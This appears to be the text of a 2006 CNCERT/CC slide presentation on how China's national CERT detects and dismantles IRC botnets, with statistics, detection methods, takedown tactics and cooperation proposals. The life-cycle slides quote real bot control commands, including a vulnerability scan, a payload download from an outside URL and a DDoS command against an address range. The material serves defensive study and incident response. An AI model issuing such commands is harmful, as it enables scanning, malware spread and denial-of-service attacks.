How CNCERT/CC fighting to Botnets. Dr.Mingqi CHEN CNCERT/CC March 31, 2006. Beijing

How CNCERT/CC fighting to Botnets Dr.Mingqi CHEN CNCERT/CC March 31, 2006. Beijing

Part 1 Content New security threats Part 2 How to detect and handle BotNets Part 3 Fighting BotNets Activities Part 4 Suggestions for Cooperation

1 Botnet at China Background: At China, the internet: 111 million Netizens Near 694 thousand websites 136,106 M international bandwidth (from CNNIC, 17 th survey till Dec 31. 2005. ) New threats: Phishing/Spyware/Botnet

Phishing Top 3 Hosting Countries: U.S:34.67%. Korea:9.83%, China:8.98%

Spywares of China Oct.9-Dec.31 2005: For 30+ Spywares,700, 000+ host at China Mainland What they are doing? -collect information and send back to servers -get key words form servers -down load files from servers Control servers: -most at foreign countries -such as: U.S 42 Korea 26

Selling Zombies Online

Providing DDoS Attack Service DDoS Attack Service! Prices List: -No FW:100RMB/H -100M Hardware FW:300RMB/H -1000M Hardware FW:600RMB/H -10,000+ chickens is guaranteed

Botnets detected at 2005 Number Number distrubution of Botnets at 2005 (more than 1000 infected hosts) 143 Botnets>5000 infected hosts Biggest:157142 infected hosts 120 What they are doing? 100 80 60 40 78 111 20 0 14 1 2 >10 万 5-10 万 3-5 万 1-3 万 1000-10000 Botnet's Scale

2 How to detect and handle Botnet Network structure of a BotNet -IRC based

Methods to detect Botnets 1 Honeynet Honeypot/Honeywall Log analysis+bot sample analysis -honeynet project 2 IDS +IRC protocol analysis -863-917 NetSec Monitoring Platform 3 BOT Beahvior Fast joining bots Long standing connection Not talkative -DdoSVax Porject

Comparision of detecting methods of IRC Botnets Scope and bot type Information Type Information granularity HoneyPot 监 测 点 上 有 感 染 传 播 能 力 的 bot bot 收 到 / 发 出 的 所 有 消 息 很 细, 但 只 限 于 bot 收 发 的 信 息 IRC protocol 监 测 范 围 内 活 动 的 bot 符 合 已 知 的 (IRC) 协 议 监 测 条 件 的 网 络 通 信 内 容 掌 握 整 体 信 息 和 一 些 特 定 命 令 信 息 ; 如 : 可 以 发 现 控 制 者 和 控 制 服 务 器 之 间 的 信 息, 但 缺 乏 报 文 内 容 信 息 Bot behaviour 监 测 范 围 内 发 现 较 大 规 模 的 且 严 格 使 用 IRC 协 议 的 botnet 不 适 合 收 集 具 体 信 息 掌 握 整 体 信 息 ; 不 适 合 收 集 具 体 信 息

Secret Life Cycle of Botnets 1 Botnet creation By SPAM/Social Enginering/Website with Malicious Codes Bt Botnets/worms:Deloder/Mytob/Zotob 2 Botnet spread TOPIC ##asn-new## :.advscan asn1smb 400 3 0 -r -b s 3 Botnet transfer( IRC Server transfer) a. Physical host transfer b. Logical host transfer(dds) c. Host Internal transfer

Secret Life Cycle of Botnets (cont.) 4 Botnet update By TOPIC 或 PRIVMSG update file: PRIVMSG ##em :!upadfkadf http://w00tage.com/stolen2.exe stolen By increase or decease module: PRIVMSG #NotaBot :.spread.add.module vnc_scan\r\n 2005 年 09 月 19 日 02 点 5 Botnet Activity Attack activities:ddos/download spywares/info.stealing/scaning&spreading TOPIC ##bla :.ddos.random 81.169. *.* 80 120// 发 动 拒 绝 服 务 攻 击 Sep.27 8PM 6 Botnet decease a C&C servers not available b bot cleaned by user or AV product c.remove/.uninstall by hacker or others d take the control by other bots

3 Preconditions of Botnets handling As Sun Tzu says: 知 己 知 彼, 百 战 不 殆 Known the enemy and yourself and you can fight a hindered battles with no danger of defeat ---The art of war C&C server info.: -DNS/IP Port Access password(if); Channel Info.: -Name Access password(if); Control password Coding rules: -Controller ID authentication: login password -Coding rules& controller in Bot Command set supported by Bot: -Authentication update self-delete commands. Such as login.update.download.uninstall etc.

Botnets handling 一 Control whole botnet 擒 贼 先 擒 王 模 拟 控 制 者, 对 僵 尸 网 络 进 行 完 全 控 制 Final Solution: Analysis the bot code Locate C&C server with the authortion or agree of user Send false update command( 吃 毒 丸 ) ; Send self-delete command ( 集 体 自 杀 ); Precondition:get the authentication information of controller 二 Cut communication channel of zombies and C&C server 釜 底 抽 薪 切 断 用 户 主 机 和 控 制 服 务 器 的 联 系 : Blcok C&C server with the accurate info.of C&C server 在 局 域 网 边 界, 阻 断 与 控 制 服 务 器 之 间 的 通 信 条 件 : 掌 握 控 制 服 务 器 的 准 确 信 息 Cancel DN serverce with : 取 消 域 名, 无 法 解 析 ; 条 件 : 得 到 授 权 三 Clean bot and patch system 攘 外 必 先 安 内 清 除 用 户 终 端 上 的 Bot 程 序, 打 补 丁 : By User: 手 工 查 杀 By AV product: 专 杀 工 具 或 升 级 杀 毒 程 序

Our actions 1. Keep Detecting Botnets through our 863-917 platform, since Dec 2004. 2. Exchange Botnets Data, especially C&C Server --Form Our partners --Form some CERTs teams 3.With the help of Local Branch and ISPs, with the agree of the Host owner of C&C server: close down the C&C server. 4. Through Information sharing channel, inform users of zombies, provide clean tools for some botnets. 5. Share bot codes and analysis results 6. Proactively work with all relevant departments to strike the criminal behaviors: creating, spreading and using malicious Bots.

Network Security Drills Dec.20, 2005: -MII & all backbone carriers of China joined -Deputy Minster of MII and 50+ officials Two Scenarios: -Critical Infrastructure attacked by Hackers -DDoS Attack driven by Botnets Dec.21,2005:APCERT security Drills

Incident Classification Standard Guidelines for Classification of Information Security Incidents (Draft Stage) - Make and Spread Bot/Trajon/Worm/Virus/other Macilious Code - Mass PII Incident(proposed) -

Typical Cases of CNCERT/CC - In Dec 2004, CNCERT/CC detected and broke down a IRC BotNet of 170,000+ hosts, which was used for a DDOS attack.(media Number: 60,000 hosts, Reported last year) - Aug. 19 2005,CNCERT/CC found a Botnet of 150,000+ hosts -find clues of hackers : 昵 称 为 gunit 的 用 户 曾 经 登 陆 该 网 络 并 向 多 个 频 道 发 送 控 制 命 令, 命 令 为 扫 描 某 种 漏 洞 (2005 年 8 月 29 日 ) - Oct.17 2005,W32/Toxbot incident, 290,000+ host, reported by SURFnet

CERTs level 4 Suggestions 1 Malicious code share and analysis 2 BotNets elimination: - Exchange C&C Server and clients information - Cooperation to break down BotNets 3 Information sharing Unaware victim information

No safe homeland without safe neighbors! Thanks! http://www.cert.org.cn cmq@cert.org.cn